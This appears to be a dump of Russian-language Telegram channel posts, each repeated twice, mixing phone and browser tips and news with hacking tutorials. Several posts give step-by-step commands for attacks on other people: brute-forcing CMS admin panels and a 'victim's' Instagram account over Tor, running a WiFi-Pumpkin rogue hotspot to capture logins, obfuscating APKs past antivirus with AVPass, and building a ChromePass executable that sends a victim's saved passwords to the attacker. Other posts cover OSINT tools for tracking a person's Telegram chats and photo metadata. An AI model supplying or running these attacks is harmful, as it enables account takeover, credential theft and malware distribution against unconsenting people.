Изменение силы вибрации на Android
После покупки ваш смартфон по умолчанию будет использовать е встроенные звуки и уровень вибрации при звонках, уведомлениях и так далее.
Но бывает, что пользователя попросту раздражают какие-то звуки и нужно настроить все звуки и вибрации полностью под себя.
Данная опция доступна только на Android выше 10 версии.
1. Пройдите по пути: "Настройки" - "Специальные Настройки" - "Вибрация и тактильная сила".
2. Далее выберите категорию в которой хотите произвести изменения.
3. Выберите один из предложенных уровней вибрации: Высокий, средний, низкий. Также можно просто отключить.
И не стоит отчаиваться, если на вашем устройстве установлен Android ниже 10-ой версии, т.к некоторые производители внедряют эту функции независимо от версии Android.
После покупки ваш смартфон по умолчанию будет использовать е встроенные звуки и уровень вибрации при звонках, уведомлениях и так далее.
Но бывает, что пользователя попросту раздражают какие-то звуки и нужно настроить все звуки и вибрации полностью под себя.
Данная опция доступна только на Android выше 10 версии.
1. Пройдите по пути: "Настройки" - "Специальные Настройки" - "Вибрация и тактильная сила".
2. Далее выберите категорию в которой хотите произвести изменения.
3. Выберите один из предложенных уровней вибрации: Высокий, средний, низкий. Также можно просто отключить.
И не стоит отчаиваться, если на вашем устройстве установлен Android ниже 10-ой версии, т.к некоторые производители внедряют эту функции независимо от версии Android.
Какие данные собирают о вас сайты?
Когда вы сидите и провите время за сёрфингом в интернете, о вас собирают данные множество сайтов, а вы об этом даже не подозреваете.
Blacklight поможет вам узнать, какие именно сайты собирают ваши данные. Данный сервис выявит не только сайты, но и какую именно технологию отслеживания они используют.
Перечень того, что может использовать сайт покажет вам сервис: использование рекламных трекеров, отпечатки браузера, отслеживание движений мыши, клики, сетевую активность.
▫️https://themarkup.org/blacklight
Когда вы сидите и провите время за сёрфингом в интернете, о вас собирают данные множество сайтов, а вы об этом даже не подозреваете.
Blacklight поможет вам узнать, какие именно сайты собирают ваши данные. Данный сервис выявит не только сайты, но и какую именно технологию отслеживания они используют.
Перечень того, что может использовать сайт покажет вам сервис: использование рекламных трекеров, отпечатки браузера, отслеживание движений мыши, клики, сетевую активность.
▫️https://themarkup.org/blacklight
👍1
Роскомнадзор продолжает давить на соцсети
2 марта 2021 Роскомнадзором на портале проектов номативно-правовых актов были опубликованы два новых приказа, связанных с контролем и администрированием социальных сетей.
Согласно первому приказу, РКН обязует соцсети на своих главных страницах публиковать ежегодный отчет, в нем должны быть выделены итоговые данные и информация по каждому кварталу отчетного года. В этом документе администрация соцсети должна раскрыть статистику по выявлению и удалению контента с запрещенной в РФ информацией, включая общее количество страниц, на которых она размещалась и была удалена;
Согласно второму приказу, РКН будет требовать от соцсетей размещения на их главной странице специальной формы для жалоб и обращений пользователей. Эта часть сайта должна быть на русском языке. У пользователя должна быть возможность перейти в эту форму прямо со своей личной страницы. В форме для жалоб обязательно должны быть такие поля: ФИО заявителя, его контактные данные, в том числе электронная почта, ссылка на страницу
Два новых проекта приказов РКН, касающихся соцсетей, будут размещены на открытом портале до 16 марта в рамках проведения общественный обсуждений.
▫️Что думаете по этому поводу?
#Новости
2 марта 2021 Роскомнадзором на портале проектов номативно-правовых актов были опубликованы два новых приказа, связанных с контролем и администрированием социальных сетей.
Согласно первому приказу, РКН обязует соцсети на своих главных страницах публиковать ежегодный отчет, в нем должны быть выделены итоговые данные и информация по каждому кварталу отчетного года. В этом документе администрация соцсети должна раскрыть статистику по выявлению и удалению контента с запрещенной в РФ информацией, включая общее количество страниц, на которых она размещалась и была удалена;
Согласно второму приказу, РКН будет требовать от соцсетей размещения на их главной странице специальной формы для жалоб и обращений пользователей. Эта часть сайта должна быть на русском языке. У пользователя должна быть возможность перейти в эту форму прямо со своей личной страницы. В форме для жалоб обязательно должны быть такие поля: ФИО заявителя, его контактные данные, в том числе электронная почта, ссылка на страницу
Два новых проекта приказов РКН, касающихся соцсетей, будут размещены на открытом портале до 16 марта в рамках проведения общественный обсуждений.
▫️Что думаете по этому поводу?
#Новости
👍1
Это вы на фото?
В ВКонтакте есть такой "прикол", когда в ленте у вас выскакивает блок с надписью "Это Вы на Фотографии?".
Кто-то относится к этому равнодушно, но мы с вами тщательно относимся к своей конфиденциальности и безопасности, именно поэтому есть способ отключить эту "Фичу":
1. Зайдите в настройки с веб-версии сайта.
2. Выберите раздел "Приватность".
3. Далее в блоке "Фотографии" найдите "Управление", затем кликните на него.
4. Перед вами появится настройка функции "Отметки на фото". Выберите и отключите всё что вам нужно.
Затем нажмите на кнопку "Сохранить". Готово, теперь никто вас не сможет отметить на фото и вы больше не увидите эту пугающую надпись "Это Вы на Фотографии?".
В ВКонтакте есть такой "прикол", когда в ленте у вас выскакивает блок с надписью "Это Вы на Фотографии?".
Кто-то относится к этому равнодушно, но мы с вами тщательно относимся к своей конфиденциальности и безопасности, именно поэтому есть способ отключить эту "Фичу":
1. Зайдите в настройки с веб-версии сайта.
2. Выберите раздел "Приватность".
3. Далее в блоке "Фотографии" найдите "Управление", затем кликните на него.
4. Перед вами появится настройка функции "Отметки на фото". Выберите и отключите всё что вам нужно.
Затем нажмите на кнопку "Сохранить". Готово, теперь никто вас не сможет отметить на фото и вы больше не увидите эту пугающую надпись "Это Вы на Фотографии?".
Оптимизация вкладок Chrome
Люди, которые используют достаточно старые ПК, наверняка сталкиваются с проблемой очень частых подвисаний бразуера. Даже если открыто всего несколько вкладок, то могут начаться сбои.
Если вас это порядком бесит, то можете воспользоваться расширением xTab для Chrome. Сразу после установки вам будет предложено установить лимит открытых вкладок.
Также дополнение способно закрывать наименее используемые влкдаки, а также вовсе запретить их создание для ещё большего облегчения работы ПК.
▫️xTab
Люди, которые используют достаточно старые ПК, наверняка сталкиваются с проблемой очень частых подвисаний бразуера. Даже если открыто всего несколько вкладок, то могут начаться сбои.
Если вас это порядком бесит, то можете воспользоваться расширением xTab для Chrome. Сразу после установки вам будет предложено установить лимит открытых вкладок.
Также дополнение способно закрывать наименее используемые влкдаки, а также вовсе запретить их создание для ещё большего облегчения работы ПК.
▫️xTab
Взлом Админ-Панели сайта
Админ-Панель - это то место, от куда владельцы сайта управляют его работой. С помощью неё можно изменять контент, оформление и так далее, поэтому получить доступ к данной панели - это получить полный доступ к управлению. Будем использовать инструмент BruteCms:
Установка:
1.
2.
3.
Использование:
1.
2.
3.
Будет открыто меню утилиты, вам доступно несколько доступных для взлома движков: WordPress, Joomla, Drupal и OpenCart.
Для данного способа вам потребуется словарь для брут-форса. Подобные словари можно скачать на любом форуме с тематикой пентеста. Если у вас нет подходящего словаря для перебора, то просто нажимаем клавишу "Enter" для использования стандартного словаря.
Далее указываем путь к словарю с паролями для атаки методом перебора. В случае успеха, подобранный пароль будет находится в файле found.brutecms.
Админ-Панель - это то место, от куда владельцы сайта управляют его работой. С помощью неё можно изменять контент, оформление и так далее, поэтому получить доступ к данной панели - это получить полный доступ к управлению. Будем использовать инструмент BruteCms:
Установка:
1.
apt install tor2.
git clone https://github.com/OffXec/brutecms3.
service tor startИспользование:
1.
cd brutecms2.
chmod +x brutecms.sh3.
./brutecms.shБудет открыто меню утилиты, вам доступно несколько доступных для взлома движков: WordPress, Joomla, Drupal и OpenCart.
Для данного способа вам потребуется словарь для брут-форса. Подобные словари можно скачать на любом форуме с тематикой пентеста. Если у вас нет подходящего словаря для перебора, то просто нажимаем клавишу "Enter" для использования стандартного словаря.
Далее указываем путь к словарю с паролями для атаки методом перебора. В случае успеха, подобранный пароль будет находится в файле found.brutecms.
Доступ к "негативной информации" через школьный Wi-Fi будет заблокирован
По информации "РБК", от 5 марта 2021 года министр просвещения РФ Сергей Кравцов рассказал, что до конца года все школы страны будут подключены к сети Интернет, в том числе в них будет развернута сеть Wi-Fi.
Городские образовательные учреждения получат доступ со скоростью не менее 100 Мбит/с, сельские и поселковые не менее 50 Мбит/с, причем в отдаленных школах будет спутниковое подключение.
Учащиеся смогут использовать школьную беспроводную сеть Wi-Fi для обучения и в своих интересах. Им будет ограничен доступ к "негативному" контенту через эту сеть. Они смогут заходить только на верифицированные ресурсы.
В начале февраля Роспотребнадзор объявил о новых санитарных правилах, согласно которым детям школьного возраста запрещено использовать личные мобильные телефоны в образовательных целях.
▫️Что думаете по этому поводу?
По информации "РБК", от 5 марта 2021 года министр просвещения РФ Сергей Кравцов рассказал, что до конца года все школы страны будут подключены к сети Интернет, в том числе в них будет развернута сеть Wi-Fi.
Городские образовательные учреждения получат доступ со скоростью не менее 100 Мбит/с, сельские и поселковые не менее 50 Мбит/с, причем в отдаленных школах будет спутниковое подключение.
Учащиеся смогут использовать школьную беспроводную сеть Wi-Fi для обучения и в своих интересах. Им будет ограничен доступ к "негативному" контенту через эту сеть. Они смогут заходить только на верифицированные ресурсы.
В начале февраля Роспотребнадзор объявил о новых санитарных правилах, согласно которым детям школьного возраста запрещено использовать личные мобильные телефоны в образовательных целях.
▫️Что думаете по этому поводу?
OSINT - Узнаём всю информацию о фотографии
Фотография может скрывать в себе очень многое, от устройства, на которое она была сделана, до координат. Даже самая обычная фотография природы может помочь сыщику в его нелёгком деле.
Многие сервисы позволяют производить поиск чего-либо на фотографии. Но данный сайт - это разработка специалистов из "Интернет-Розыск.рф", который собрал в себе практически все нужные инструменты для просмотра информации фото.
На данном сайте сервисы разбиты на несколько секторов: Распознавание лиц на фото, определение оригинальности, качества и возраст фото. Помимо этого, присутствует уже всем так полюбившийся, но уже более прокаченный чекер метаданных.
▫️Сервис
Фотография может скрывать в себе очень многое, от устройства, на которое она была сделана, до координат. Даже самая обычная фотография природы может помочь сыщику в его нелёгком деле.
Многие сервисы позволяют производить поиск чего-либо на фотографии. Но данный сайт - это разработка специалистов из "Интернет-Розыск.рф", который собрал в себе практически все нужные инструменты для просмотра информации фото.
На данном сайте сервисы разбиты на несколько секторов: Распознавание лиц на фото, определение оригинальности, качества и возраст фото. Помимо этого, присутствует уже всем так полюбившийся, но уже более прокаченный чекер метаданных.
▫️Сервис
5 полезных дополнений в Chrome
В данном посте будет представлена подборка из достаточно полезных расширений для браузера Chrome, они упростят и сделают сёрфинг по сети ещё более приятным.
Survol - это расширение создано для того, чтобы Вы не переходили на сомнительные сайты, а могли просто наведя на ссылку увидеть превью страницы.
Funnel Search - упростит Вашу работу с поисковыми операторами Google. Составляет Google-дорки через довольно простой интерфейс.
Universal Bypass - обходит практически все сокращатели ссылок, перейдя по которым Вас могут заставить смотреть рекламу, а также противостоит сбору Ваших данных.
SponsorBlock - это очень полезное расширение, которое автоматически будет пропускать рекламные вставки на YouTube.
Picture-in-Picture Extension - позволит Вам смотреть любое видео в режиме "Картинка в Картинке"
В данном посте будет представлена подборка из достаточно полезных расширений для браузера Chrome, они упростят и сделают сёрфинг по сети ещё более приятным.
Survol - это расширение создано для того, чтобы Вы не переходили на сомнительные сайты, а могли просто наведя на ссылку увидеть превью страницы.
Funnel Search - упростит Вашу работу с поисковыми операторами Google. Составляет Google-дорки через довольно простой интерфейс.
Universal Bypass - обходит практически все сокращатели ссылок, перейдя по которым Вас могут заставить смотреть рекламу, а также противостоит сбору Ваших данных.
SponsorBlock - это очень полезное расширение, которое автоматически будет пропускать рекламные вставки на YouTube.
Picture-in-Picture Extension - позволит Вам смотреть любое видео в режиме "Картинка в Картинке"
Обмен файлами на Android устройствах
В новых версиях ОС Android пользователям стала доступна функция "Nearby Share". Она позволяет отправлять файлы на другие устройства, которые находятся поблизости от вас.
Для активации данной фичи пройдите по пути: "Настройки" - "Google" - "Подключения устройства", далее активируйте её, кликнув на соответствующий ползунок. Далее выделите нужный вам файл и отправьте его с помощью любого приложения, выбрал пункт "Обмен с окружением".
Для стабильной работы Nearby Share необходимо активировать Wi-Fi, Bluetooth и GPS (Одновременно). Также, если у вас возникла проблема с отсутствием пункта "Обмен с окружением", это означает, что ваш телефон ещё не поддерживает данную функцию.
В новых версиях ОС Android пользователям стала доступна функция "Nearby Share". Она позволяет отправлять файлы на другие устройства, которые находятся поблизости от вас.
Для активации данной фичи пройдите по пути: "Настройки" - "Google" - "Подключения устройства", далее активируйте её, кликнув на соответствующий ползунок. Далее выделите нужный вам файл и отправьте его с помощью любого приложения, выбрал пункт "Обмен с окружением".
Для стабильной работы Nearby Share необходимо активировать Wi-Fi, Bluetooth и GPS (Одновременно). Также, если у вас возникла проблема с отсутствием пункта "Обмен с окружением", это означает, что ваш телефон ещё не поддерживает данную функцию.
P2P Чат в Termux
Одноранговая, децентрализованная, или пиринговая (P2P) сеть — оверлейная компьютерная сеть, основанная на равноправии участников. Данную сеть можно использовать для анонимность переписки, такой метод был реализован даже для Android устройств с помощью Termux.
Установка на оба устройства:
▫️
Инструкция для первого устройства:
Узнаём IP:
▫️
Открываем порты (Рандомные 5 цифр):
▫️
Второе устройство:
Подключение ко второму устройству:
Для этого первый пользователь должен прислать вам открытый порт и IP, а далее вы прописываете команду:
▫️
Можно начинать переписку.
Одноранговая, децентрализованная, или пиринговая (P2P) сеть — оверлейная компьютерная сеть, основанная на равноправии участников. Данную сеть можно использовать для анонимность переписки, такой метод был реализован даже для Android устройств с помощью Termux.
Установка на оба устройства:
▫️
apt install netcatИнструкция для первого устройства:
Узнаём IP:
▫️
ifconfigОткрываем порты (Рандомные 5 цифр):
▫️
nc -l -p 12345Второе устройство:
Подключение ко второму устройству:
Для этого первый пользователь должен прислать вам открытый порт и IP, а далее вы прописываете команду:
▫️
nc "IP" 1234Можно начинать переписку.
Переносим переписки из WhatsApp в Telegram
Война между WhatsApp и Telegram идёт полным ходом, но руководство первого мессенджера допустило огромнейшую ошибку в их недавнем обновлении Политики Конфиденциальности. Пользователи WhatsApp очень недовольны, как итог произошел тотальный обвал скачиваний: за неделю количество загрузок мессенджера упало на 2 миллиона.
Ну а Telegram приобрёл сотни тысяч новых пользователей, что очень порадовало Павла Дурова и в связи с этим он решил добавить опцию импорта чатов из других мессенджеров прямиком в Telegram.
1. Откройте любой групповой или личный чат в WhatsApp.
2. Перейдите в меню и выберите опцию "Экспорт чата".
3. После этого, в меню "Поделиться" выберите Telegram.
Будет запущен процесс импорта чатов, выбираем нужного нам человека и нажимаем на "Import".
Война между WhatsApp и Telegram идёт полным ходом, но руководство первого мессенджера допустило огромнейшую ошибку в их недавнем обновлении Политики Конфиденциальности. Пользователи WhatsApp очень недовольны, как итог произошел тотальный обвал скачиваний: за неделю количество загрузок мессенджера упало на 2 миллиона.
Ну а Telegram приобрёл сотни тысяч новых пользователей, что очень порадовало Павла Дурова и в связи с этим он решил добавить опцию импорта чатов из других мессенджеров прямиком в Telegram.
1. Откройте любой групповой или личный чат в WhatsApp.
2. Перейдите в меню и выберите опцию "Экспорт чата".
3. После этого, в меню "Поделиться" выберите Telegram.
Будет запущен процесс импорта чатов, выбираем нужного нам человека и нажимаем на "Import".
Какие данные собирают о вас сайты?
Когда вы сидите и провите время за сёрфингом в интернете, о вас собирают данные множество сайтов, а вы об этом даже не подозреваете.
Blacklight поможет вам узнать, какие именно сайты собирают ваши данные. Данный сервис выявит не только сайты, но и какую именно технологию отслеживания они используют.
Перечень того, что может использовать сайт покажет вам сервис: использование рекламных трекеров, отпечатки браузера, отслеживание движений мыши, клики, сетевую активность.
▫️https://themarkup.org/blacklight
Когда вы сидите и провите время за сёрфингом в интернете, о вас собирают данные множество сайтов, а вы об этом даже не подозреваете.
Blacklight поможет вам узнать, какие именно сайты собирают ваши данные. Данный сервис выявит не только сайты, но и какую именно технологию отслеживания они используют.
Перечень того, что может использовать сайт покажет вам сервис: использование рекламных трекеров, отпечатки браузера, отслеживание движений мыши, клики, сетевую активность.
▫️https://themarkup.org/blacklight
Блокировка рекламы без расширений
Большинство расширений увеличивают нагрузку браузера на операционную систему, и чем их больше - тем медленнее работает браузер. Чтобы уменьшить нагрузку на браузер, можно найти альтернативы некоторым расширениям, например Adguard DNS.
Adguard специализируется на блокировке нежелательной рекламы, и в качестве альтернативы расширениям предлагает подключение через собственные DNS-сервера. Во время загрузки страницы DNS-сервер отсеивает запросы к трекерам и рекламным сервисам.
Главное преимущество этого подхода - ничего не нужно устанавливать. Вам достаточно указать DNS-сервера AdGuard в настройках подключения к сети, и вы получите защиту от рекламы для вашего компьютера или смартфона. Также DNS можно поменять в роутере, тогда защита распространится на всю локальную сеть.
Adguard DNS можно настроить на любой платформе. Подробную инструкцию для каждой из них вы можете найти здесь.
#security
Большинство расширений увеличивают нагрузку браузера на операционную систему, и чем их больше - тем медленнее работает браузер. Чтобы уменьшить нагрузку на браузер, можно найти альтернативы некоторым расширениям, например Adguard DNS.
Adguard специализируется на блокировке нежелательной рекламы, и в качестве альтернативы расширениям предлагает подключение через собственные DNS-сервера. Во время загрузки страницы DNS-сервер отсеивает запросы к трекерам и рекламным сервисам.
Главное преимущество этого подхода - ничего не нужно устанавливать. Вам достаточно указать DNS-сервера AdGuard в настройках подключения к сети, и вы получите защиту от рекламы для вашего компьютера или смартфона. Также DNS можно поменять в роутере, тогда защита распространится на всю локальную сеть.
Adguard DNS можно настроить на любой платформе. Подробную инструкцию для каждой из них вы можете найти здесь.
#security
Xiaomi запатентовала технологию обнаружения посторонних лиц
Согласно описанию патента для обнаружения нежелательных лиц в смартфон пользователя будет встроен специальный датчик, который сможет определить, что кто-то посторонний заглядывает в экран.
При обнаружении постороннего система либо предупредит пользователя, либо примет защитные меры самостоятельно, например, скрыв просматриваемое приложение.
#xiaomi
Согласно описанию патента для обнаружения нежелательных лиц в смартфон пользователя будет встроен специальный датчик, который сможет определить, что кто-то посторонний заглядывает в экран.
При обнаружении постороннего система либо предупредит пользователя, либо примет защитные меры самостоятельно, например, скрыв просматриваемое приложение.
#xiaomi
Взлом Instagram
Примерно год назад разработчики Instagram накосячили с очередным обновлением и дали возможность хакерам осуществлять взлом с помощью перебора паролей без каких-либо ограничений.
Из этого выходит, что Bruteforce всё ещё актуален, а для осуществления подобной атаки не нужны особые навыки и знания.
Установка:
Устанавливаем Termux
1. Скачиваем репозиторий GitHub:
2. Переходим:
3. Даём разрешение на запуск:
4. Запускаем TOR сервисы:
5. Запуск
Готово. После запуска программы введите имя профиля жертвы в Instagram и путь к словарю с паролями.
Примерно год назад разработчики Instagram накосячили с очередным обновлением и дали возможность хакерам осуществлять взлом с помощью перебора паролей без каких-либо ограничений.
Из этого выходит, что Bruteforce всё ещё актуален, а для осуществления подобной атаки не нужны особые навыки и знания.
Установка:
Устанавливаем Termux
1. Скачиваем репозиторий GitHub:
git clone https://github.com/thelinuxchoice/instashell2. Переходим:
cd instashell 3. Даём разрешение на запуск:
chmod +x instashell.sh4. Запускаем TOR сервисы:
service tor start 5. Запуск
./instashell.shГотово. После запуска программы введите имя профиля жертвы в Instagram и путь к словарю с паролями.
OSINT разведка в Telegram
В данном посте пойдёт речь о достаточно полезном боте @TgScanRobot. Он позволит вам найти практически все публичные чаты в которых состоит цель.
Для поиска нужно переслать сообщение пользователя или же прислать Username/ID. Вам сразу будет выдан список всех публичных чатов в которых он состоит.
Данный бот на данный момент имеет в своей базе порядка 500 тыс. групп и информацию про 83-х миллионах активных юзеров. Минус в том, что за час можно выполнить максимум 10 запросов.
Также присутствует опция, которая предоставляет возможность самостоятельного добавления нового чата с помощью команды / add @groupname
▫️https://t.me/tgscanrobot
В данном посте пойдёт речь о достаточно полезном боте @TgScanRobot. Он позволит вам найти практически все публичные чаты в которых состоит цель.
Для поиска нужно переслать сообщение пользователя или же прислать Username/ID. Вам сразу будет выдан список всех публичных чатов в которых он состоит.
Данный бот на данный момент имеет в своей базе порядка 500 тыс. групп и информацию про 83-х миллионах активных юзеров. Минус в том, что за час можно выполнить максимум 10 запросов.
Также присутствует опция, которая предоставляет возможность самостоятельного добавления нового чата с помощью команды / add @groupname
▫️https://t.me/tgscanrobot
Точка доступа для перехвата данных
Зачастую люди попросту не хотят заботиться о безопасности своих данных, и подключаясь к "Халявному" Wi-Fi сильно рискуют отдать свои деньги в руки злоумышленника.
Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата:
1. Устанавливаем репозиторий GitHub:
-
2. Переходим в директорию утилиты:
-
3. Даём права исполняющему файлу:
-
4. Установка всех компонентов:
-
5. Запуск:
-
Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy".
Зачастую люди попросту не хотят заботиться о безопасности своих данных, и подключаясь к "Халявному" Wi-Fi сильно рискуют отдать свои деньги в руки злоумышленника.
Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата:
1. Устанавливаем репозиторий GitHub:
-
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git2. Переходим в директорию утилиты:
-
cd WiFi-Pumpkin3. Даём права исполняющему файлу:
-
chmod +x installer.sh4. Установка всех компонентов:
-
sudo ./installer.sh --install5. Запуск:
-
wifi-pumpkinБудет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy".
Обходим антивирус на Android
Самые обычные юзеры ОС Android не подозревают об опасности софта, установленного из Play Market.
Даже в нем есть заражённое вирусами ПО, простой пример: в 2019 году компания Trend Micro нашла более 50-и подобных приложений.
Разработчики обходят защиту за счёт маскировки логики программы, это называют обфускацией. Данный способ можно использовать с помощью инструмента AVPass.
Установка:
-
-
Использование:
-
Будет сгенерирован APK файл, который не будет детектится большинством антивирусов.
Самые обычные юзеры ОС Android не подозревают об опасности софта, установленного из Play Market.
Даже в нем есть заражённое вирусами ПО, простой пример: в 2019 году компания Trend Micro нашла более 50-и подобных приложений.
Разработчики обходят защиту за счёт маскировки логики программы, это называют обфускацией. Данный способ можно использовать с помощью инструмента AVPass.
Установка:
-
git clone https://github.com/sslab-gatech/avpass-
./install-dep.shИспользование:
-
python gen_disguise.py -i <название файла> individualБудет сгенерирован APK файл, который не будет детектится большинством антивирусов.
Сбрасываем пароль от Kali Linux
Kali Linux - это эталон безопасности и анонимности, его работа полностью направлена на обеспечение полной конфиденциальности пользователя в интернете. Но каждая система имеет свои изъяны.
Если получилось так, что вы забыли свой пароль, то могу с уверенностью сказать - вам не стоит быть хакером. Но если серьёзно, то первым делом нужно перезапустить систему и подождать, пока откроется GNU GRUB.
Нажимаем на "E", тем самым открыв конфиг GRUB.
Ищем строку "linux /boot/vmlinuz-3.18", в конце нее ставим пробел и вписываем "single init=/bin/bash". Жмем F10, чтобы все сохранилось.
Сразу откроется терминал, вводите команды по порядку:
-
-
Надо прописать 2 раза новый пароль, далее:
-
Новый пароль был успешно устанвлен!
Kali Linux - это эталон безопасности и анонимности, его работа полностью направлена на обеспечение полной конфиденциальности пользователя в интернете. Но каждая система имеет свои изъяны.
Если получилось так, что вы забыли свой пароль, то могу с уверенностью сказать - вам не стоит быть хакером. Но если серьёзно, то первым делом нужно перезапустить систему и подождать, пока откроется GNU GRUB.
Нажимаем на "E", тем самым открыв конфиг GRUB.
Ищем строку "linux /boot/vmlinuz-3.18", в конце нее ставим пробел и вписываем "single init=/bin/bash". Жмем F10, чтобы все сохранилось.
Сразу откроется терминал, вводите команды по порядку:
-
mount -rw -o remount /-
passwd rootНадо прописать 2 раза новый пароль, далее:
-
shutdown -h nowНовый пароль был успешно устанвлен!
Получаем доступ к сохраненным паролям Chrome
ChromePass - это терминальная утилита, написанная на языке программирования Python, она способна "добывать" сохраненные пароли в Chrome.
Установка:
-
-
-
-
-
-
После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение.
Осталось подождать пока всё будет готово. После этого запускаем client.txt, а файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.
ChromePass - это терминальная утилита, написанная на языке программирования Python, она способна "добывать" сохраненные пароли в Chrome.
Установка:
-
git clone https://github.com/darkarp/chromepass.git-
cd chromepass-
pip install -r requirements.txt-
python -m pip install --upgrade pip-
python -m pip install -r requirements.txt-
python create_server.pyПосле запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение.
Осталось подождать пока всё будет готово. После этого запускаем client.txt, а файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.